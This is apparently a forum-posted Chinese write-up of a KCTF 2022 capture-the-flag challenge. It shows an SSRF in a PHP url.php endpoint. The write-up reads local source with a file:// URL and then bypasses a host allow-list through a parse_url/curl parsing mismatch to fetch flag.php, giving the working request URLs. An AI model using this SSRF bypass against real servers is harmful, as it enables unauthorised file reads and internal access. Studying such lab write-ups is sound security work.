-
-
[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP
-
发表于: 2022-5-16 21:14 4757
-
发现存在一个phpinfo和一个ssrf的地址
尝试file://去读ssrf文件源代码-url.php读到了源码
http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
看到了php_curl以及
1 2 3 4 5 6 7 | if ($host = = "ctf.pediy.com" ||$host = = "127.0.0.1" ||$host = = "localhost" ){ / / echo curl_request( "http://123.57.254.42/flag.php" , "get" ,[],true, 5 ); / / get flag echo curl_request($url,'', "get" ,[],true, 5 ); } else { die( "host not allow" ); } |
这里需要绕过让host满足条件
因为存在curl一个特性:
a://b/../flag.php,parse_url会认为host是b,但是用phpcurl访问时相当于http://a/flag.php
构建
1 | http: / / 121.36 . 145.157 : 8044 / url.php?url = 123.57 . 254.42 : / / 127.0 . 0.1 / .. / flag.php |
读取flag
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2022-5-17 12:34
被柘狐编辑
,原因:
赞赏
他的文章
看原图
赞赏
雪币:
留言: